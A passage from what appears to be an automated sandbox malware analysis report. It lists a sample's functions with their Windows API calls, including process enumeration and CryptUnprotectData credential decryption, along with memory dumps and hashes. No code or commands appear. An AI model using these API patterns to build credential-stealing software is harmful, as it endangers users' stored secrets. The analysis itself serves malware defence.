                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 13de2375701789094fd049e58dbb093793072892d376110ca8717b0f2d9eea34
                          • Instruction ID: 742cccd4e8f89916b3199d2cc1143c6c113ad21825a019b413c246458f40adfc
                          • Opcode Fuzzy Hash: 13de2375701789094fd049e58dbb093793072892d376110ca8717b0f2d9eea34
                          • Instruction Fuzzy Hash: 5F3127B190121CABCB24EF54CC45FEEB778EB49740F1181A9E60EA6190DF746A45CFB1
                          Function 00DF8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00DE5184,40000001,00000000,00000000,?,00DE5184), ref: 00DF8EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 83291a4b133f1a44810521b055b3229c340f5a91a61c2b6447a25c928b5e673c
                          • Instruction ID: 47494f05f8b0022e4e692e75ce3ed8f317998b5e9bdc4d7ce45925907992e570
                          • Opcode Fuzzy Hash: 83291a4b133f1a44810521b055b3229c340f5a91a61c2b6447a25c928b5e673c
                          • Instruction Fuzzy Hash: 17110670200208EFDB10CF64D889FBA73A9AF89714F11D448FE598B240DB76E841EB71
                          Function 00DE9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 8a93cd8558a64ece8561a0c04b43fbe8f2269294a23aa0812fd26f59533327df
                          • Instruction ID: 129c905bc1d711d214f83148dd6ac0b9a748e02c9e02ecbbf5f687160fd01a6b
                          • Opcode Fuzzy Hash: 8a93cd8558a64ece8561a0c04b43fbe8f2269294a23aa0812fd26f59533327df
                          • Instruction Fuzzy Hash: 6D11A4B4241208FFEB10CF64D895FAAB7B5FB89700F208058FE159B384C7B6A941CB50
                          Function 00DF7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E00,00000000,?), ref: 00DF79B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF79B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00E00E00,00000000,?), ref: 00DF79C4
                          • wsprintfA.USER32 ref: 00DF79F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: e4e166f3b5a152e8442ba719110141c3bac65a562f58fadca71ee1bc3588b023
                          • Instruction ID: 341fd929aec26f3dcdf41508b6263fbf20f9472329a0ac6c40a84af4f79fbc76
                          • Opcode Fuzzy Hash: e4e166f3b5a152e8442ba719110141c3bac65a562f58fadca71ee1bc3588b023
                          • Instruction Fuzzy Hash: 161115B2A04118EACB249FC9D945BBEB7F8EB4CB11F10425AF645A2684E7795940CBB0
                          Function 00DF7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008405A0,00000000,?,00E00E10,00000000,?,00000000,00000000), ref: 00DF7A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008405A0,00000000,?,00E00E10,00000000,?,00000000,00000000,?), ref: 00DF7A7D
                          • wsprintfA.USER32 ref: 00DF7AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 73d8cbc166753137f943fbc8b54b53f8af346b5373a1121081401712dfa0a6d3
                          • Instruction ID: 898ab09815d90c0b4102b7960749e66ad323736eba80725155b604ac406b3079
                          • Opcode Fuzzy Hash: 73d8cbc166753137f943fbc8b54b53f8af346b5373a1121081401712dfa0a6d3
                          • Instruction Fuzzy Hash: 021182B1A45218DFDB208F54DC49FA9B778F704721F114396E60A936C0D7745A40CF50
                          Function 00DF3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(00DFE118,00000000,00000001,00DFE108,00000000), ref: 00DF3758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00DF37B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 244adc25883f8bcc6f150b77d0aa20ff1d6f798ae32cd0b5023bc18e3971de24
                          • Instruction ID: 5b8ebf536b15b3d36c9e88a9d01025d26e24471ecd6ac5bd044f591e8349a74a
                          • Opcode Fuzzy Hash: 244adc25883f8bcc6f150b77d0aa20ff1d6f798ae32cd0b5023bc18e3971de24
                          • Instruction Fuzzy Hash: 4641E870A00A1C9FDB24DB58CC94BABB7B4BB48702F4181D8E609A7290D771AE85CF60
                          Function 00DE9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                          • LocalFree.KERNEL32(?), ref: 00DE9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 4e0962dbf89243dd8b7f9e89d3c1c6aea24a1372e38a93ad570158714c5850d7
                          • Instruction ID: ded890a50c3e0d701ac369aa400ae10ff0cc151c836653b4c1611b9ee84098c3
                          • Opcode Fuzzy Hash: 4e0962dbf89243dd8b7f9e89d3c1c6aea24a1372e38a93ad570158714c5850d7
                          • Instruction Fuzzy Hash: A41109B8A00209EFCB04DF94D985AAEB7B5FF88300F104598EC15A7350D775AE50CFA1
                          Function 011B1418 Relevance: 4.1, Strings: 2, Instructions: 1572COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: aIn~$Xo%
                          • API String ID: 0-3752357015
                          • Opcode ID: 385f87f05f861c3040c77929330a504693d19437706cfbf8baa0eec851051f35
                          • Instruction ID: 444a8ec42d5039d51bea98e0223a3195df7758bbf5dda78b2661bcf599f88aaf
                          • Opcode Fuzzy Hash: 385f87f05f861c3040c77929330a504693d19437706cfbf8baa0eec851051f35
                          • Instruction Fuzzy Hash: BBB2E6F3A0C2049FE304AE2DEC8577ABBE5EB94720F164A3DE6C5C3744E63598058697
                          Function 011351D0 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '6EA$|nz
                          • API String ID: 0-1580316990
                          • Opcode ID: f0f12fdf4d4a31ffb8a21940acff9a2a998dd1534f96326a38666490dd08a74d
                          • Instruction ID: 05e715188e05308fe0965320be4f50e83f38ff5db0823fbbd92d24cb2c10e031
                          • Opcode Fuzzy Hash: f0f12fdf4d4a31ffb8a21940acff9a2a998dd1534f96326a38666490dd08a74d
                          • Instruction Fuzzy Hash: D15127F3B082045FF304AA2CEC8177AB7D6DB94310F16863DEA85D77C4E93998058286
                          Function 010F52ED Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: v;
                          • API String ID: 0-2572620731
                          • Opcode ID: 0cfe4825db6c8b2e987fb77c9ef72ef7013f7613f2a35a2c48015b6664c18ed1
                          • Instruction ID: a8921cab7836799e956804d7b7c2d76a68dace20d28efe2b120c9a611efc42c1
                          • Opcode Fuzzy Hash: 0cfe4825db6c8b2e987fb77c9ef72ef7013f7613f2a35a2c48015b6664c18ed1
                          • Instruction Fuzzy Hash: BB51D6B2A0D3149FE3006F29ED856BAFBE8EB54760F16893DE6C483700E6355D448797
                          Function 0119FAA2 Relevance: .4, Instructions: 424COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e81dc1786dc8b1e3efab6ee96a852dda35b4bfef222bad28497dbcebd7ca5264
                          • Instruction ID: 53e2452a2ccc82b25f0a4066bc31a5ebb68259f979a10fbd1e3958a279d176be
                          • Opcode Fuzzy Hash: e81dc1786dc8b1e3efab6ee96a852dda35b4bfef222bad28497dbcebd7ca5264
                          • Instruction Fuzzy Hash: D5C139F390C210ABE3146E29EC9577ABBE9EF54730F2A062DEAC4C3784E5755C018697
                          Function 010CBC61 Relevance: .2, Instructions: 216COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
